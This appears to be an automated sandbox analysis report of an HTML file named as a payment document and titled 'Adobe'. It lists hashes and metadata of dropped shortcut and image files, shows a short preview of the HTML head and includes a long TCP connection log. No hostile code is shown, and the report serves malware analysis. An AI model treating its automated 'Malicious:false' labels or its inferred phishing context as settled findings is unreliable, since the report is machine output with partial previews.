                                  Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I"Z.K....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Z.K....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V"Z.K....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V"Z.K..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 2 08:28:32 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2681
                                  Entropy (8bit):3.9985022173207145
                                  Encrypted:false
                                  SSDEEP:48:8lOd5ThVxHOidAKZdA1vehDiZUkwqehqy+R:86HDQy
                                  MD5:13470FDC1065BC0D79472D3CAF57D0F9
                                  SHA1:D38FD0B47842CE8056CB2D9F0BC318D008FD9F72
                                  SHA-256:E80C1E74B8A8B0D239D07CBFAF9A0119B22821F25A3FC85237FE09BEB48C4FB1
                                  SHA-512:D846845550B7F471AED294A6E0661F66F14A5020E0831041D80B4E8321E8B05FDF49359AF764F608CA86894AFBB67DB3944AF827FFDD6F3D86496D6F9BA6F810
                                  Malicious:false
                                  Reputation:low
                                  Preview:L..................F.@.. ...$+.,....&....\..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I"Z.K....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Z.K....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V"Z.K....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V"Z.K..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V"Z.K...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 2 08:28:33 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2681
                                  Entropy (8bit):3.9876508803389323
                                  Encrypted:false
                                  SSDEEP:48:8UOd5ThVxHOidAKZdA1hehBiZUk1W1qehcy+C:8rHT98y
                                  MD5:814CFFF7BC7D4FC53D0EC4F74D8C245B
                                  SHA1:43D9A685EA4371E0B4F8B5F37ABBB04DA6B7F779
                                  SHA-256:3C2802D0CD3ACC1B4F69B86A290C1D6B6FEA397BDE0AED3222D999B4D16CD185
                                  SHA-512:833C1B92ADEE57844827DBDA83DC2CB11527AE1D0E4989D2644711418D28581EB6D1539753331F312D51164DE6C98E43AE13D3371F00FB6F56B6CB126E6C285B
                                  Malicious:false
                                  Reputation:low
                                  Preview:L..................F.@.. ...$+.,.........\..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I"Z.K....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Z.K....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V"Z.K....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V"Z.K..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V"Z.K...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 2 08:28:32 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2683
                                  Entropy (8bit):3.9993072803338943
                                  Encrypted:false
                                  SSDEEP:48:8iOd5ThVxHOidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbSy+yT+:8FHDT/TbxWOvTbSy7T
                                  MD5:F5AD993E25E52748B0E07D95DB586818
                                  SHA1:24F1502B0B860F4070804FE0E3BEFB3792F0A1E3
                                  SHA-256:FE097036E1B4F0904EC218BACA8F31F8426571ADB298DE3C1DC43933CB6E3447
                                  SHA-512:40AE9A4D5FEDACA71612A8C98AC01CFB9FDEB0BCAD74F23F63A58CEDE4E0D513F6FA3109306B98882A57A2DA44E72744F6E99BDE8EBAFAFAEC50D2FAA0968BE8
                                  Malicious:false
                                  Reputation:low
                                  Preview:L..................F.@.. ...$+.,.....R...\..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I"Z.K....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Z.K....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V"Z.K....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V"Z.K..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V"Z.K...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 2160 x 2160, 8-bit/color RGB, non-interlaced
                                  Category:dropped
                                  Size (bytes):52776
                                  Entropy (8bit):7.162855847228631
                                  Encrypted:false
                                  SSDEEP:768:ixYqNcv/OYTvIXo78/r1s/LQir52jtLgGig4xO9KLlXK4vDQAAxbwBTHIO3ZPxI+:iETv6oYG/8QoBgGwxv5lDQAOETDdxrAE
                                  MD5:1EA40CED761036F097D5ABB9B0C50DB9
                                  SHA1:DC2AB8515BC376B7A0E2BF485057A18AE66C6FFA
                                  SHA-256:AFC646B4BDBFA9B9B9D17AE28C4BBA6275DA4EE24E95404EC76DB411F9EDCEB8
                                  SHA-512:DB3BCAEA699066D161E5F29E2BFEF262B9354997CA74846E7D5A2826EC56FE70FE971810E69F8F14D5B814FB0B5C5A7B508ED77EDB47A2C63C5F3B8C216EEE39
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR...p...p........>....sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(..........Y..)....O..h.-... .IDATx...Al..}...b..L.......h.Z#.[....i.i.d..mj.,...JE;.Rr.%=..J.*...D....H.....DK..(..C....i..<...^....KS..~....?...!...8.....y........C.O=.........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P......
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 2160 x 2160, 8-bit/color RGB, non-interlaced
                                  Category:downloaded
                                  Size (bytes):52776
                                  Entropy (8bit):7.162855847228631
                                  Encrypted:false
                                  SSDEEP:768:ixYqNcv/OYTvIXo78/r1s/LQir52jtLgGig4xO9KLlXK4vDQAAxbwBTHIO3ZPxI+:iETv6oYG/8QoBgGwxv5lDQAOETDdxrAE
                                  MD5:1EA40CED761036F097D5ABB9B0C50DB9
                                  SHA1:DC2AB8515BC376B7A0E2BF485057A18AE66C6FFA
                                  SHA-256:AFC646B4BDBFA9B9B9D17AE28C4BBA6275DA4EE24E95404EC76DB411F9EDCEB8
                                  SHA-512:DB3BCAEA699066D161E5F29E2BFEF262B9354997CA74846E7D5A2826EC56FE70FE971810E69F8F14D5B814FB0B5C5A7B508ED77EDB47A2C63C5F3B8C216EEE39
                                  Malicious:false
                                  Reputation:low
                                  URL:https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-3vBlwryYM-nViujdAgEHoxOEPnBH93ECZB9TD7s6RP4K82VxMGwK5IE25cXnzwGDfx2tEnAiZBfzgYML-pfkuxpvqP72-v0eFpETk20PZCVhHnQOaGa2XQ7_XEEkfvlBt-DyP8340HFGybdoWWh9Ai54XC0uZoP7hPIjO49whnc1qFk5MX5UqRrvkId8/s2160/image.png
                                  Preview:.PNG........IHDR...p...p........>....sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(..........Y..)....O..h.-... .IDATx...Al..}...b..L.......h.Z#.[....i.i.d..mj.,...JE;.Rr.%=..J.*...D....H.....DK..(..C....i..<...^....KS..~....?...!...8.....y........C.O=.........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P......
                                  File type:HTML document, ASCII text, with very long lines (303)
                                  Entropy (8bit):4.589177039119844
                                  TrID:
                                  • HyperText Markup Language (15015/1) 20.56%
                                  • HyperText Markup Language (12001/1) 16.44%
                                  • HyperText Markup Language (12001/1) 16.44%
                                  • HyperText Markup Language (11501/1) 15.75%
                                  • HyperText Markup Language (11501/1) 15.75%
                                  File name:Payment_00372_26-12-2024.html
                                  File size:5'909 bytes
                                  MD5:eb5666e02c87df8dfd6d0b25a0ea5e17
                                  SHA1:addf219a3f1fabafa88e1293f3570abe9e627c66
                                  SHA256:0292c04d2d424c5a5e207bca888fa649bc139c145c6bd5898457485157c5ac74
                                  SHA512:c7ce203a16edcb3176d3d943480e28cf115ecc37508d3ac9b680a0e3e8b700841012d1a1ada6f82531be554f88bf72347b6f6c66d784b9f068651673ae58c12c
                                  SSDEEP:96:Si8HAZBXYJN0bRpVOyJBNR/O3Cs4qPiE2OSUAuxqYgPPD:p8HoVm9yJBNR+CsFPiE2hpuxJSPD
                                  TLSH:E2C1759379E208262A4390B93696A7483624E017D749DE5A3FCD12B98FC5BD948773C8
                                  File Content Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>Adobe</title>. <style>. /* Body styling with the provided background image */. body {
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 2, 2025 10:28:24.500828028 CET49674443192.168.2.523.1.237.91
                                  Jan 2, 2025 10:28:24.500845909 CET49675443192.168.2.523.1.237.91
                                  Jan 2, 2025 10:28:24.594575882 CET49673443192.168.2.523.1.237.91
                                  Jan 2, 2025 10:28:32.351366997 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:32.351411104 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:32.351479053 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:32.351696014 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:32.351706982 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:32.640568018 CET49710443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:32.640620947 CET44349710172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:32.640700102 CET49710443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:32.641175985 CET49710443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:32.641189098 CET44349710172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.082323074 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.082606077 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.082626104 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.082987070 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.082999945 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.083065987 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.083072901 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.083120108 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.083694935 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.084826946 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.084889889 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.085139036 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.085144043 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.171647072 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.356636047 CET44349710172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.356823921 CET49710443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.356843948 CET44349710172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.357223988 CET44349710172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.357239962 CET44349710172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.357300997 CET49710443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.357309103 CET44349710172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.357326984 CET49710443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.357362032 CET49710443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.357959986 CET44349710172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.373963118 CET49710443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.374044895 CET44349710172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.472965002 CET49710443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.472990990 CET44349710172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.527896881 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.527941942 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.528031111 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.528050900 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.530704021 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.531382084 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.531388044 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.537020922 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.539244890 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.539251089 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.543319941 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.547347069 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.547353029 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.549561977 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.551188946 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.551194906 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.555970907 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.559348106 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.559354067 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.562335014 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.563282967 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.563288927 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.568552971 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.571157932 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.571163893 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.585674047 CET49710443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.616276026 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.617095947 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.617147923 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.617161036 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.617171049 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.617206097 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.623570919 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.627109051 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.627115965 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.629837036 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.631165981 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.631174088 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.636061907 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.639681101 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.639695883 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.642422915 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.643429995 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.643439054 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.648677111 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.651120901 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.651129007 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.654989958 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.655031919 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.655039072 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.661262035 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.661314011 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.661320925 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.667131901 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.667191982 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.667198896 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.672657967 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.672775030 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.672785044 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.677966118 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.678034067 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.678040028 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.678101063 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.678181887 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.678616047 CET49707443192.168.2.5172.217.16.193
                                  Jan 2, 2025 10:28:33.678634882 CET44349707172.217.16.193192.168.2.5
                                  Jan 2, 2025 10:28:33.695435047 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:33.695468903 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:33.695534945 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:33.696024895 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:33.696046114 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.245157957 CET49675443192.168.2.523.1.237.91
                                  Jan 2, 2025 10:28:34.245203972 CET49673443192.168.2.523.1.237.91
                                  Jan 2, 2025 10:28:34.267832041 CET49674443192.168.2.523.1.237.91
                                  Jan 2, 2025 10:28:34.325316906 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.343596935 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.343628883 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.344175100 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.344192982 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.344250917 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.344259977 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.344326973 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.344933033 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.346870899 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.346941948 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.347141981 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.347157001 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.502764940 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.761080980 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.761126041 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.761183023 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.761205912 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.763767004 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.763823032 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.763834000 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.770134926 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.770220041 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.770226955 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.775326967 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.775408030 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.775417089 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.781593084 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.781651974 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.781661987 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.787940979 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.788005114 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.788014889 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.794131041 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.794188976 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.794203043 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.800477982 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.800529957 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.800539017 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.847625017 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.847686052 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.847696066 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.850235939 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.850291967 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.850300074 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.856430054 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.856498957 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.856507063 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.862798929 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.862925053 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.862932920 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.869164944 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.869216919 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.869227886 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.875400066 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.875451088 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.875459909 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.881690979 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.881753922 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.881763935 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.888096094 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.888166904 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.888181925 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.894277096 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.894340038 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.894347906 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.900237083 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.900295973 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.900302887 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.905592918 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.905798912 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.905807018 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.911042929 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.911098957 CET49713443192.168.2.5142.250.186.65
                                  Jan 2, 2025 10:28:34.911107063 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.911168098 CET44349713142.250.186.65192.168.2.5
                                  Jan 2, 2025 10:28:34.911266088 CET49713443192.168.2.5142.250.186.65
